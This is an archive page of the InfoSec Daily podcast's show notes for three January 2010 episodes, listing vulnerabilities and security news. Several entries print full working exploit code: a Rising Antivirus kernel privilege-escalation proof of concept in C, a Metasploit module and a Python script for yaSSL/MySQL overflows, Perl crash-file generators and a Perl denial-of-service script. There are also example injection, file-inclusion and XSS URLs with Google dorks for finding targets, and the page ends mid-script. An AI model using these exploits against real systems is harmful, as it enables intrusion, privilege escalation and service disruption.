InfoSec Daily » 2010

2010
01.29

Episode 57 – HDD Phasers

Category: Podcast / Tags: no tag / Add Comment

InfoSec Daily Podcast

InfoSec Podcast Episode 57 for January 29, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:
FORENSICS 606: Drive and Data Recovery Forensics Canceled

Vulnerabilities of Interest:

FUSE is subject to a race-condition vulnerability. Local attackers can exploit this issue to cause a denial of service via symlink attacks involving FUSE shares belonging to privileged user. NOTE: Successful exploitation of the issue requires the attacker being a member of the ‘fuse’ group. This can be exploited using readily available tools.
Samba is subject to a local privilege-escalation vulnerability in the ‘mount.cifs’ utility. Local attackers can exploit this issue to gain elevated privileges on affected computers. This can be exploited using readily available tools.
The ‘com_ccnewsletter’ component for Joomla! is subject to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input data. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. Example URL: http://www.sample.com/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00 Google Dork: inurl: index.php?option=com_ccnewsletter
Rising Antivirus is subject to multiple local privilege-escalation vulnerabilities that affect various drivers. An attacker can exploit these issues to execute arbitrary code with elevated privileges, facilitating a complete compromise of the affected computer. Rising Antivirus 2008 and Rising Antivirus 2009 are vulnerable. Exploit code is available:
// Rising0day.cpp : Defines the entry point for the console application.
//
#include “stdafx.h”
#include “windows.h”
enum { SystemModuleInformation = 11 };
typedef struct {
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
HANDLE g_RsGdiHandle = 0 ;
void __stdcall WriteKVM(PVOID Address , ULONG Value)
{
ULONG ColorValue = Value ;
ULONG btr ;
ULONG ColorBuffer = 0 ;

DeviceIoControl(g_RsGdiHandle ,
0x83003C0B,
&ColorValue ,
sizeof(ULONG),
&ColorBuffer ,
sizeof(ULONG),
&btr ,
0
);
DeviceIoControl(g_RsGdiHandle ,
0x83003C0B,
&ColorValue ,
sizeof(ULONG),
Address ,
sizeof(ULONG),
&btr ,
0
);
return ;
}
void AddCallGate()
{
ULONG Gdt_Addr;
ULONG CallGateData[0x4];
ULONG Icount;
__asm
{
push edx
sgdt [esp-2]
pop edx
mov Gdt_Addr , edx
}
__asm
{

push 0xc3
push Gdt_Addr
call WriteKVM
mov eax,Gdt_Addr
mov word ptr[CallGateData],ax
shr eax,16
mov word ptr[CallGateData+6],ax
mov dword ptr[CallGateData+2],0x0ec0003e8
mov dword ptr[CallGateData+8],0x0000ffff
mov dword ptr[CallGateData+12],0x00cf9a00
xor eax,eax
LoopWrite:
mov edi,dword ptr CallGateData[eax]
push edi
mov edi,Gdt_Addr
add edi,0x3e0
add edi,eax
push edi
mov Icount,eax
call WriteKVM
mov eax,Icount
add eax , 0×4
cmp eax,0×10
jnz LoopWrite
}

return ;
}

void IntoR0(PVOID function)
{
WORD Callgt[3];
Callgt[0] = 0;
Callgt[1] = 0;
Callgt[2] = 0x3e3;
__asm
{
call fword ptr[Callgt]
mov eax,esp
mov esp,[esp+4]
push eax
call function
pop esp
push offset ring3Ret
retf
ring3Ret:
nop
}
return ;

}
#pragma pack(1)
typedef struct _IDTR
{
SHORT IDTLimit;
UINT IDTBase;
}IDTR,
*PIDTR,
**PPIDTR;
#pragma pack()
ULONG g_RealSSDT = 0 ;
ULONG ServiceNum = 0 ;
ULONG OrgService [0x1000] ;
ULONG RvaToOffset(IMAGE_NT_HEADERS *NT, ULONG Rva)
{
ULONG Offset = Rva, Limit;
IMAGE_SECTION_HEADER *Img;
WORD i;

Img = IMAGE_FIRST_SECTION(NT);

if (Rva < Img->PointerToRawData)
return Rva;

for (i = 0; i < NT->FileHeader.NumberOfSections; i++)
{
if (Img[i].SizeOfRawData)
Limit = Img[i].SizeOfRawData;
else
Limit = Img[i].Misc.VirtualSize;

if (Rva >= Img[i].VirtualAddress &&
Rva < (Img[i].VirtualAddress + Limit))
{
if (Img[i].PointerToRawData != 0)
{
Offset -= Img[i].VirtualAddress;
Offset += Img[i].PointerToRawData;
}

return Offset;
}
}

return 0;
}
#define ibaseDD *(PDWORD)&ibase
DWORD GetHeaders(PCHAR ibase, PIMAGE_FILE_HEADER *pfh, PIMAGE_OPTIONAL_HEADER *poh, PIMAGE_SECTION_HEADER *psh)
{
PIMAGE_DOS_HEADER mzhead=(PIMAGE_DOS_HEADER)ibase;
if ((mzhead->e_magic!=IMAGE_DOS_SIGNATURE)||(ibaseDD[mzhead->e_lfanew]!=IMAGE_NT_SIGNATURE)) return FALSE;
*pfh=(PIMAGE_FILE_HEADER)&ibase[mzhead->e_lfanew];
if (((PIMAGE_NT_HEADERS)*pfh)->Signature!=IMAGE_NT_SIGNATURE) return FALSE;
*pfh=(PIMAGE_FILE_HEADER)((PBYTE)*pfh+sizeof(IMAGE_NT_SIGNATURE));
*poh=(PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh+sizeof(IMAGE_FILE_HEADER));
if ((*poh)->Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC) return FALSE;
*psh=(PIMAGE_SECTION_HEADER)((PBYTE)*poh+sizeof(IMAGE_OPTIONAL_HEADER));
return TRUE;
}
typedef struct {
WORD offset:12;
WORD type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;
#define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset)))
DWORD FindKiServiceTable(HMODULE hModule,DWORD dwKSDT , PULONG ImageBase)
{
PIMAGE_FILE_HEADER pfh;
PIMAGE_OPTIONAL_HEADER poh;
PIMAGE_SECTION_HEADER psh;
PIMAGE_BASE_RELOCATION pbr;
PIMAGE_FIXUP_ENTRY pfe;

DWORD dwFixups=0,i,dwPointerRva,dwPointsToRva,dwKiServiceTable;
BOOL bFirstChunk;

GetHeaders((PCHAR)hModule,&pfh,&poh,&psh);

if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &&
(!((pfh->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED))) {

pbr=(PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress,hModule);
bFirstChunk=TRUE;
while (bFirstChunk || pbr->VirtualAddress) {
bFirstChunk=FALSE;

pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr+sizeof(IMAGE_BASE_RELOCATION));

for (i=0;i<(pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;i++,pfe++) {
if (pfe->type==IMAGE_REL_BASED_HIGHLOW) {
dwFixups++;
dwPointerRva=pbr->VirtualAddress+pfe->offset;
dwPointsToRva=*(PDWORD)((DWORD)hModule+dwPointerRva)-(DWORD)poh->ImageBase;

if (dwPointsToRva==dwKSDT)
{
if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7)
{
dwKiServiceTable=*(PDWORD)((DWORD)hModule+dwPointerRva+4)-poh->ImageBase;
*ImageBase = poh->ImageBase;
return dwKiServiceTable;
}
}

}
}
*(PDWORD)&pbr+=pbr->SizeOfBlock;
}
}

return 0;
}
DWORD CR0Reg ;
ULONG realssdt ;
void InKerneProc()
{
__asm
{
cli
mov eax, cr0
mov CR0Reg,eax
and eax,0xFFFEFFFF
mov cr0, eax
}
int i;
for (i = 0; i < (int)ServiceNum; i++)
{
*(ULONG*)(*(ULONG*)realssdt + i * sizeof(ULONG)) = OrgService[i];
}
__asm
{
mov eax, CR0Reg
mov cr0, eax
sti
}

}
int main(int argc, char* argv[])
{
printf(“Rising AntiVirus 2008 ~ 2010 \n”
“Local Privilege Escalation Vulnerability Proof Of Concept Exploit\n 2010-1-27\n”);

g_RsGdiHandle = CreateFile(“\\\\.\\RSNTGDI” ,
0,
FILE_SHARE_READ | FILE_SHARE_WRITE ,
0,
OPEN_EXISTING , 0 , 0 );
if (g_RsGdiHandle == INVALID_HANDLE_VALUE)
{
return 0 ;
}

SYSTEM_MODULE_INFORMATION ModuleInfo ;

// Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it’s base address

HMODULE hlib = GetModuleHandle(“ntdll.dll”);
PVOID pNtQuerySystemInformation = GetProcAddress(hlib , “NtQuerySystemInformation”);
ULONG infosize = sizeof(ModuleInfo);

__asm
{
push 0
push infosize
lea eax , ModuleInfo
push eax
push 11
call pNtQuerySystemInformation
}

HMODULE KernelHandle ;
LPCSTR ntosname = (LPCSTR)((ULONG)ModuleInfo.Module[0].ImageName + ModuleInfo.Module[0].PathLength);

// Load the kernel image specified
KernelHandle = LoadLibrary(ntosname);
if (KernelHandle == 0 )
{
return 0 ;
}

ULONG KeSSDT = (ULONG)GetProcAddress(KernelHandle , “KeServiceDescriptorTable”);

if (KeSSDT == 0 )
{
return 0 ;
}
ULONG ImageBase = 0 ;
ULONG KiSSDT = FindKiServiceTable(KernelHandle , KeSSDT – (ULONG)KernelHandle , &ImageBase);
if (KiSSDT == 0 )
{
return 0 ;
}
KiSSDT += (ULONG)KernelHandle;
ServiceNum = 0x11c ;
ULONG i ;

for (i = 0 ; i < ServiceNum ; i ++)
{
OrgService[i] = *(ULONG*)(KiSSDT + i * sizeof(ULONG)) + (ULONG)ModuleInfo.Module[0].Base – ImageBase;
}

realssdt = KeSSDT – (ULONG)KernelHandle + (ULONG)ModuleInfo.Module[0].Base;

SetThreadAffinityMask(GetCurrentThread () , 0 ) ;

AddCallGate();
IntoR0(InKerneProc);
return 0;
}
Discuz! is subject to an cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Discuz! 6.0.0 is vulnerable; other versions may also be affected. Example URL: http://www.sample.com/bbs/viewthread.php?tid=”>><script>alert(HACKED BY FATAL ERROR)</script><marquee><h1>XSS By Fatal Error</h1></marquee> Google Dork: inurl: /bbs/viewthread.php?
KOL Wave IOX 1.04 .wav is subject to a local buffer overflow because the application fails to properly perform adequate bounds checks. Exploit Code is available:
#!/usr/bin/perl
#########################################################
## Usage–>>file created–>>load file–>>b00m.wav
>>>BOOM
#########################################################

print “#####################################################n”;
print “[!] KOL WaveIOX 1.04 (.wav) Local Buffer Overflow PoCn”;
print “n”;
print “[!] Author: cr4wl3rn”;
print “[!] Mail: cr4wl3r[!]linuxmail.orgn”;
print “#####################################################n”;

my $boom = “http://”.”x41″ x 1337;
my $filename = “b00m.wav”;
open (FILE,”>$filename”);
print FILE “$boom”;
print “nFile successfully created!n”;
KOL Wave Player 1.0 s subject to a local buffer overflow because the application fails to properly perform adequate bounds checks. Exploit Code is available:
#!/usr/bin/perl
#########################################################
## Usage–>>file created–>>load file–>>b00m.wav
>>>BOOM
#########################################################

print “#####################################################n”;
print “[!] KOL Wave Player 1.0 (.wav) Local Buffer Overflow
PoCn”;
print “n”;
print “[!] Author: cr4wl3rn”;
print “[!] Mail: cr4wl3r[!]linuxmail.orgn”;
print “#####################################################n”;

my $boom = “http://”.”x41″ x 1337;
my $filename = “b00m.wav”;
open (FILE,”>$filename”);
print FILE “$boom”;
print “nFile successfully created!n”;

News Items of Interest:

News item 1: http://www.scmagazineus.com/popularity-of-apple-devices-draws-malware-report/article/162331/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+SCMagazineNews+%28SC+Magazine+News%29
Amid speculation that Apple is set to introduce its tablet device tomorrow at a press event in California, a discussion of the security implications will not likely be a part of the hoopla. While the device is already being touted as a game-changer in the publishing industry, reportedly introducing a new digital platform with a 10-inch screen for the delivery of newspaper and magazine content, what’s likely to follow within months of the debut, if history is any precedent, is a new wave of malware targeting the device. Users tuning in for their daily news feed or perusing copies of their favorite magazines may become victims of new iterations of malware likely intended to make off with their passwords and personal information to then be offered for sale in the nether regions of cyberspace.
.
News item 2:http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3211248
A bogus IQ test program or through an infected website, Zimuse fills the first 50Kb MBR of each disk with zeroes, rendering A virus that was created as a prank targetting an off-road Slovakian motorcycle club is causing an issue for web users across the world. Security company ESET said the Windows-borne ‘Zimuse’ is a retro oddity because it attacks a hard disk master boot record (MBR) of any attached drive its finds, a technique common in viruses from nearly 20 years ago. As with viruses of old, its spread is aided by its ability to infect the modern equivalent of floppy disks, USB sticks.
News item 3: http://www.v3.co.uk/v3/news/2256845/cybercrime-taken-seriously

Cyber crime is not being treated properly or taken sufficiently seriously by the police, according to a new study from the University of Leicester.

The study analysed the policing of the internet, and raised a number of concerns about police attitudes to the growing menace. Public Policing and Internet Crime, written by Professor Yvonne Jewkes of Leicester’s Department of Criminology, highlighted a general unwillingness to investigate cyber crimes, and warned that even when they are investigated, it is rarely through co-operation between different organisations or across geographical boundaries.
News item 4: http://nmap.org
Nmap 5.21 released. Fixed an error that occurred when UDP scan was combined with version scan. UDP ports would appear in the state “unknown” at the end of the scan, and in some cases an assertion failure would be raised. This was an unintended side effect of the memory use reduction changes in 5.20.

Technical Segment: http://www.myharddrivedied.com/sans.html
Presentation: http://www.myharddrivedied.com/diy-data-recovery.pdf

2010
01.28

Episode 56 – Barcode Fun

Category: Podcast / Tags: no tag / Add Comment

InfoSec Daily Podcast

InfoSec Podcast Episode 56 for January 28, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:

FORENSICS-606: Drive and Data Recovery Forensics (Canceled)

Louisville OWASP Chapter – Fourth Meeting, Friday January 29th, 2010

Please Note: RSVP Required! The meeting location this quarter has a capacity of 40 persons. Please send your RSVP as soon as possible to ensure a seat and lunch. We apologize for any inconvenience this may cause and are seeking a larger venue for future meetings.

To RSVP: Just send a reply to brian.r.blankenship@gmail.com and indicate how many are coming.

Date/Time: January 29th, 11:30 – 1:00PM
Location: MetroSafe Building, 410 S. Fifth Street. (there is a parking lot across the street, and a parking garage 1/2 block away).

Lunch is being provided by Imperva and Accuvant.

Speaker: Rafal Los will be discussing Flash and Web 2.0 security (see bio below)

“Rafal Los, Security Specialist with Hewlett-Packard’s Application Security Center (ASC), is an industry veteran who has worked in a variety of security positions— from consultant to Information Security Officer in the Fortune 100— within some of the most demanding business environments. Rafal’s unique blend of technical expertise and business knowledge enable him to teach audiences about security techniques, programs and processes that they can both understand strategically, and realistically apply. He has extensive experience in security testing, risk analysis and management, penetration testing and architecture and policy. Previous successes include building and implementing a successful web application security program for one of the largest and most diverse companies in the world.”
Vulnerabilities of Interest:

yaSSL is subject to multiple remote buffer-overflow vulnerabilities.Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of applications using the library. Failed attacks will cause denial-of-service conditions. yaSSL 1.7.5 is vulnerable to these issues; other versions are also likely to be affected. Proof-of-concept and exploit code are available:
##
# $Id: mysql_yassl_hello.rb 8242 2010-01-26 20:12:13Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require ‘msf/core’

class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘MySQL yaSSL SSL Hello Message Buffer Overflow’,
‘Description’ => %q{
This module exploits a stack overflow in the yaSSL (1.7.5 and earlier)
implementation bundled with MySQL <= 6.0. By sending a specially crafted
Hello packet, an attacker may be able to execute arbitrary code.
},
‘Author’ => [ 'MC' ],
‘License’ => MSF_LICENSE,
‘Version’ => ‘$Revision: 8242 $’,
‘References’ =>
[
[ 'CVE', '2008-0226' ],
[ 'OSVDB', '41195'],
[ 'BID', '27140' ],
],
‘Privileged’ => true,
‘DefaultOptions’ =>
{
‘EXITFUNC’ => ‘thread’,
},
‘Payload’ =>
{
‘Space’ => 600,
‘BadChars’ => “\x00\x20\x0a\x0d\x2f\x2b\x0b\x5c”,
‘StackAdjustment’ => -3500,
‘PrependEncoder’ => “\x81\xc4\x54\xf2\xff\xff”,
},
‘Platform’ => ‘win’,
‘Targets’ =>
[
[ 'MySQL 5.0.45-community-nt', { 'Ret' => 0x008b9d45 } ],
[ 'MySQL 5.1.22-rc-community', { 'Ret' => 0x008b04c9 } ],
],
‘DefaultTarget’ => 0,
‘DisclosureDate’ => ‘Jan 4 2008′))

register_options([ Opt::RPORT(3306) ], self)
end

def exploit
connect

sock.get_once

req_uno = [0x01000020].pack(‘V’)

req_dos = [0x00008daa].pack(‘V’) + [0x40000000].pack(‘V’)
req_dos << [0x00000008].pack(‘V’) + [0x00000000].pack(‘V’)
req_dos << [0x00000000].pack(‘V’) + [0x00000000].pack(‘V’)
req_dos << [0x00000000].pack(‘V’) + [0x00000000].pack(‘V’)
req_dos << [0x03010000].pack(‘V’) + [0x00000001].pack(‘V’)
req_dos << “\x00\x0F\xFF” + rand_text_alphanumeric(3917 – payload.encoded.length)
req_dos << make_nops(100) + payload.encoded + [target.ret].pack(‘V’)
req_dos << make_nops(16) + [0xe8, -650].pack(‘CV’) + rand_text_alphanumeric(1024)

print_status(“Trying target #{target.name}…”)

sock.put(req_uno)
sock.put(req_dos)

handler
disconnect
end

end
MySQL compiled with yaSSL is subject to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. MySQL 5.5.0-ms2 is vulnerable when compiled with yaSSL; other versions may also be affected.
#!/usr/bin/env python
#
# Use this code at your own risk. Never run it against a production system.
#
# THE SOFTWARE IS PROVIDED “AS IS” AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

“”"
Usage: mysql_overflo1.py localhost

MySQL yassl cert parsing stack overflow

Debug session on 5.5.0-m2

suse11:~ # gdb -q
(gdb) att 5542
Attaching to process 5542
Reading symbols from /var/mysql/libexec/mysqld…cdone.
…
0xffffe430 in __kernel_vsyscall ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb6bbab90 (LWP 5545)]
0×41424344 in ?? ()
(gdb)

“”"
import os
import getopt
import sys
import socket
import time
import telnetlib
import struct
import base64
import random

class theexploit:
def __init__(self,host):
self.host = host
self.port = 3306

def gettcpsock(self):
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
return sock

def int2berlen(self,i):
e=self.int2ber(i, signed=0)
if i <= 127:
return e
else:
l=len(e)
return chr(0×80|l) + e

def int2ber(self,i, signed=1):
encoded=”
while ((signed and (i>127 or i<-128))
or (not signed and (i>255))):
encoded=chr(i%256)+encoded
i=i>>8
encoded=chr(i%256)+encoded
return encoded

def big_endian_24(self, length):
l1 = (length & 0xff0000) >> 16;
l2 = (length & 0xff00) >> 8;
l3 = length & 0xff;
size = chr(l1) + chr(l2) + chr(l3)
return size

def attack_mysql(self):
sock = self.gettcpsock()
sock.connect((self.host, self.port))
#sock.set_timeout(30.0)

print “press any key”
sys.stdin.readline()

s=sock.recv(8000)
print s

s =”\x20\x00\x00\x01\x85\xae\x03\x00\x00\x00\x00\x01\x08\x00\x00\x00″
s+=”\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″
s+=”\x00\x00\x00\x00″
s+=”\x16\x03\x01\x00\x60\x01\x00\x00\x5c\x03\x01\x4a\x92\xce\xd1\xe1″
s+=”\xab\x48\x51\xc8\x49\xa3\x5e\x97\x1a\xea\xc2\x99\x82\x33\x42\xd5″
s+=”\x14\xbc\x05\x64\xdc\xb5\x48\xbd\x4c\x11\x55\x00\x00\x34\x00\x39″
s+=”\x00\x38\x00\x35\x00\x16\x00\x13\x00\x0a\x00\x33\x00\x32\x00\x2f”
s+=”\x00\x66\x00\x05\x00\x04\x00\x63\x00\x62\x00\x61\x00\x15\x00\x12″
s+=”\x00\x09\x00\x65\x00\x64\x00\x60\x00\x14\x00\x11\x00\x08\x00\x06″
s+=”\x00\x03\x02\x01\x00″

sock.sendall(s)
print “Sent SSL_CLIENT_HELLO”

sock.sendall(self.make_overflow())
print “Sent SSL_CLIENT_CERTIFICATE”
sock.close()

def run(self):
self.attack_mysql()
return 0

def make_overflow(self):
retaddr=0×41424344
cn=”"
cn += “\x00″* 1062
cn+=struct.pack (“<L”,retaddr)*6
#cn += “\x40″ * 100
#cn += “\xcc”*100
#cn += “\x40″ * 100

cert = “\x2a\x86\x00\x84″ + struct.pack(“>L”,len(cn)) + cn

cert = “\x30\x82\x01\x01\x31\x82\x01\x01\x30\x82\x01\x01\x06\x82\x00\x02″ + cert

cert =”\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x04\x05\x00″ + cert

cert = “\x30″ + self.int2berlen(len(cert)) + cert
cert = “\x30″ + self.int2berlen(len(cert)) + cert

cert1 = self.big_endian_24(len(cert)) + cert
certs = self.big_endian_24(len(cert1)) + cert1

handshake = “\x0b” + self.big_endian_24(len(certs)) + certs
msg = “\x16\x03\x01″ + struct.pack(“>H”,len(handshake)) + handshake

return msg

if __name__==”__main__”:
app = theexploit(sys.argv[1])
app.run()
PostgreSQL is subject to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code with elevated privileges or crash the affected application. PostgreSQL 8.0.23 is vulnerable; other versions may also be affected. Proof of concept is available: testdb=# select substring(B’10101010101010101010101010101010101010101010101′,33,-15);
VirtueMart is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URLs:
http://www.sample.com/[JOOMLA_PATH]/administrator/index.php?page=order.order_status_form&limitstart=0&keyword=&order_status_id=[SQL]&option=com_virtuemart

http://www.sample.com/[JOOMLA_PATH]/administrator/index.php?page=order.order_status_form&limitstart=0&keyword=&order_status_id=-1%27+UNION+ALL+SELECT+1,username,password,@@version,database%28%29,6+FROM+jos_users%23&option=com_virtuemart

http://www.sample.com/[JOOMLA_PATH]/1%27%20union%20all%20select%20@@version
MiFi 2352 is subject to an information-disclosure vulnerability that may expose sensitive information. Successful exploits will allow authenticated attackers to obtain passwords, which may aid in further attacks. MiFi 2352 access point firmware 11.47.17 is vulnerable; other versions may also be affected. Example URLs:
http://www.sample.com/config.xml.sav

http://www.sample.com/config.xml.save
e107 is subject to an unspecified remote vulnerability. Very little is known about this issue. Versions prior to e107 0.7.17 are vulnerable. This issue was exploited in an attack against the vendor’s website. Currently we are not aware of any publicly available exploits.
phpYabs is subject to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. phpYabs 0.1.2 is vulnerable; other versions may also be affected. Example URL: http://www.sample.com/phpyabs/moduli/libri/index.php?Azione=[SHELL] GoogleDork: inurl: phpyabs/moduli/libri/index.php
The JBDiary component for Joomla! is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URLs:
http://www.sample.com/?newyear=2011′+and+substring(@@version,1,1)=4%23&newmonth=01

http://www.sample.com/?newyear=2011′+and+substring(@@version,1,1)=5%23&newmonth=01

http://www.sample.com/?newyear=2011&newmonth=01′+and+substring(@@version,1,1)=4%23

http://www.sample.com/?newyear=2011&newmonth=01′+and+substring(@@version,1,1)=5%23

News Items of Interest:

News item 1: http://www.businesswire.com/portal/site/topix/?ndmViewId=news_view&newsId=20100127005098&newsLang=en
An IT security expert and blogger claims to have successfully intercepted and compromised phone calls made using 12 commercially available mobile voice encryption products. PhoneCrypt from SecurStar was one of only three solutions that successfully blocked the attacks that were made using a simple wiretapping Trojan.

“Like most security breaches, Notrax went for the weakest link; he did not attempt to crack the encryption itself, but used simple wiretapping techniques”

Using a readily available wiretapping utility, costing as little as $100, as well as his own ‘homemade’ Trojan, the blogger – aka Notrax – was able to by-pass the encryption and eavesdrop by capturing conversations from the microphone and speaker in real time. By suppressing any rings, notifications or call logs, these attacks go completely undetected. And while Trojans can be installed manually by someone with access to the phone, they could equally be delivered via email, SMS or a mobile application.

Notrax describes his tests extensively at www.infosecurityguard.com with links to Youtube videos.
News item 2: http://www.newsfactor.com/story.xhtml?story_id=12200DUI6NKA&full_skip=1
In a move that could invigorate weak sales of Google’s Nexus One smartphone, Wal-Mart, the world’s largest retailer, appears ready to start selling the device. According to one online report, the cost could be as low as $99 — much lower than the subsidized $179 price from T-Mobile with a two-year plan.

News item 3: http://www.internetnews.com/security/article.php/3860871

Data breach incidents cost companies an average of $6.75 million each time, according to a new study released by security researcher The Ponemon Institute and PGP Corp., an e-mail and data encryption security software developer.

And while the study found that the total number of reported data breaches declined from 657 incidents in 2008 to 498 last year, the average cost inched up from $202 to $204 per customers record.

The firms’ joint U.S. Cost of Data Breach Study chronicles a wide range of cost factors, including the outlays for detection, escalation, notification and response along with legal, investigative and administrative expenses, customer defections, opportunity loss and reputation management.

The $6.75 million cost per incident was slightly higher than the $6.65 million enterprise clients shelled out in 2008. Those figures include the costs associated with customer support such as information hotlines and credit monitoring subscriptions.

Technical Segment: http://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php

2010
01.27

Episode 55 – Taint Garden

Category: Podcast / Tags: no tag / Add Comment

InfoSec Daily Podcast

InfoSec Podcast Episode 55 for January 27, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

SEC-606: Drive and Data Recovery Forensics   2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth   2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems   3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression   4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth   5/17/10 to 5/21/10

Go online to register by going to the SANS website or call (301) 654-SANS(7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

Vulnerabilities of Interest:

P2GChinchilla HTTP Server version 1.1.1 is subject to a remote denial of service. Exploit code is availabe:

#!/usr/bin/perl
# File Name 2GChinchilla[TM] HTTP Server
# Vuln : Remote Denial Of Service Exploit
# Auther : Zer0 Thunder
# Msn : zer0_thunder@colombohackers.com
#
#
##==——>>
#
# Exploit Title: P2GChinchilla[TM] HTTP Server 1.1.1 Remote Denial Of
Service Exploit
# Date: 22/01/2010
# Author: Zer0 Thunder
# Site : http://www.proggies2go.org/pages/p2gChinchilla.html?ref=PAD
# Software Link:

http://www.proggies2go.org/pages/p2gChinchilla/p2gChinchilla.rar

# Version: v 1.1.1
# Tested on: Server runs on Windows XP Sp2 /Test on Remote Location
##==——>>
use IO::Socket::INET;
$ip = $ARGV[0];
$port = $ARGV[1];
if (! defined $ARGV[0])
{
print
“t+================================================================+n&
quot;;
print “t+ — P2GChinchilla[TM] HTTP Server 1.1.1 Denial Of Service
—+n”;
print “t+ — Author :Zer0 Thunder
—+n”;
print “t+ — DATE: :[24/01/2010]
—+n”;
print “t+ — ————————————————
—+n”;
print “t+ — Usage :perl exploit.pl [Host/Remote IP] [Port]
—+n”;
print “t+ —
—+n”;
print
“t+================================================================+n&
quot;;
print “n”;
print ” Ex : exploit.pl localhost 50000n”; # P2GChinchilla
Default Port is 50000

exit;
}

print
“t+================================================================+n&
quot;;
print “t+ — P2GChinchilla[TM] HTTP Server 1.1.1 Denial Of Service
—+n”;
print “t+ — Author :Zer0 Thunder
—+n”;
print “t+ — DATE: :[24/01/2010]
—+n”;
print “t+ — ————————————————
—+n”;
print “t+ — Usage :perl exploit.pl [Host/Remote IP] [Port]
—+n”;
print “t+ —
—+n”;
print
“t+================================================================+n&
quot;;
print “n”;
print ” Wait Till The Buffer is Donen”;
my $b1 = “x41″ x 100000000;
print “n”;
print ” DoS is UP !.. N Give it a Second n”;

$DoS=IO::Socket::INET->new(“$ip:$port”) or die;

print $DoS “stor $b1n”;
print $DoS “QUITn”;

close $DoS;

# exit :

The login page of the F2L-3000 version 4.0.0 is vulnerable to SQL Injection. Exploitation of the vulnerability may allow attackers to bypass
authentication and access sensitive information stored on the device. A patch is not available at this time. Possible workarounds include
disabling the vulnerable service, or limiting access to a set of trusted IP addresses.
Winamp version 5.572 is subject to local buffer overflow. Exploit code is available:

#!/usr/bin/perl

# Still learning, having some fun…
# Greetz to _-Sid-_ >Roadkill< Jess Dawn Linki
